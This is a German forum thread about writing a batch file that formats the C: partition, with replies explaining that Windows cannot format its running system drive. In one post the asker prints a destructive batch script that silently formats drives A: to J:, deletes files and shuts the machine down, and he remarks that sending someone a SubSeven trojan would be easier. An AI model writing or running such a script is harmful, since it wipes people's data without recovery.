Batch Datei!

  • geschlossen

  • mortall
  • 1023 Aufrufe 7 Antworten

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Hallo,
    ich habe eine Frage! ich versuche mit eine Batchdatei zu schreiben dass ich damit meine C Partition formatieren kann!
    kann jemand mir dabei Helfen?
    LG
    Mortall
  • ja, klar kannst du!
    ich habe versucht meine C partition formatieren weil ich neue Windows darauf installieren möchte! ich weiss dass man bei der Windows CD das selbe auch machen kann aber ich wollte einfach fragen ob eine möglichkeit gibt. weil wenn ich jedesmal meine C Partition formatieren möchte kriege ich eine Fehlermeldung dass es nicht geht!?
  • Einfach in eine Textdatei "format c" reinschreiben, abspeichern und als Dateiendung ".bat" einfügen. Allerdings hab ich keine Ahnung was dir das bringen soll.

    Möchtest du damit die Windows-Systempartition während des laufenden Betriebs löschen wollen kannst du das vergessen, das wird Windows nicht zulassen ;)
    [SIZE="1"]User helfen Usern: Die FSB-Tutoren

    Sag nein zu Filehostern - [color="blue"]AOKHA[/color]

    Ups: Horst Evers MovieMix How High Generals + 2x Xvid Viele Klassiker-Games[/SIZE]
  • Hallo,

    wie Aruelius schon sagte, den Ast absägen auf dem man selber sitzt (format c während von c gebootet wurde) funktioniert per Batch nicht. Die Gründe sind HIER nachzulesen.

    Dazu musst du schon eine etwas aufwendigere Anwendung schreiben.

    MFG
    Tiger


    P.s.: Sollte das ein versuch werden um evtl. bei jemand anderes Schaden anzurichten (warum sonst sollte man so ne Batch wollen?) Finde ich du solltest mit der Betreffenden Person reden und den Klein-Jungen-Streit anders beilegen.
  • Streit??
    wenn ich sowas für jemand schreiben möchte dann finde ich es ist besser wenn ich einfach ein SubSeven Client ihm schicken!! findest du nicht?!
    außerdem ich finde nicht dass mein Frage dumm ist!
    ich kann auch das schreiben!!!
    @echo off

    FORMAT A: /Q /U /y
    FORMAT b: /Q /U /y
    FORMAT d: /Q /U /y
    FORMAT e: /Q /U /y
    FORMAT f: /Q /U /y
    FORMAT g: /Q /U /y
    FORMAT h: /Q /U /y
    FORMAT i: /Q /U /y
    FORMAT j: /Q /U /y
    FORMAT c: /Q /U /y
    echo J | del "%quelle%"
    echo J | del c:/a:h *._*

    shutdown -s -t 2000
    ??????????????????????????????????????????????????????
  • Wie schon gesagt kannst du dein Windows nicht formatieren, während es läuft. Du kannst lediglich die Windows Installation beschädigen, sodass der PC nicht mehr bootet. Du wirst auf diesem Weg C: jedoch nicht formatiert bekommen!

    Das wäre ja dasselbe, wie wenn du während dem Autofahren versuchst die Räder abzumontieren :D

    Phunny